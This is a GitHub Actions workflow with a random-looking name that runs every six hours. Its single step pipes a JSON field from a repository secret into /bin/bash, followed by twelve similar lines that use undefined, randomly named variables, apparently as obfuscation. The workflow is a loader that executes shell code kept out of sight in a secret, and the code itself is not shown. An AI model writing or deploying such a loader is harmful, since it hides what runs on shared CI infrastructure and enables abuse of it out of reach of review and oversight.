name: mudongsheng9371
on:
  workflow_dispatch:
  schedule:
    - cron: '39 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mudongsheng9371
        env:
          nrn513: ${{ secrets.nrn513 }}
        run: |
          echo $nrn513 | jq -r .qp90 | /bin/bash
          echo $tyleg5106 | jq -r .ywr0 | /bin/bash
          echo $hlxzw675 | jq -r .oid48895 | /bin/bash
          echo $w35 | jq -r .uggvw0827 | /bin/bash
          echo $srng1 | jq -r .pufe58492 | /bin/bash
          echo $xwc51871 | jq -r .sojx803 | /bin/bash
          echo $e60841 | jq -r .e1668 | /bin/bash
          echo $twfki5487 | jq -r .n66705 | /bin/bash
          echo $ir817 | jq -r .dl083 | /bin/bash
          echo $vd99 | jq -r .tg6 | /bin/bash
          echo $rcgda00 | jq -r .xqxc86 | /bin/bash
          echo $o549 | jq -r .r987 | /bin/bash
          echo $ko5945 | jq -r .iy7 | /bin/bash

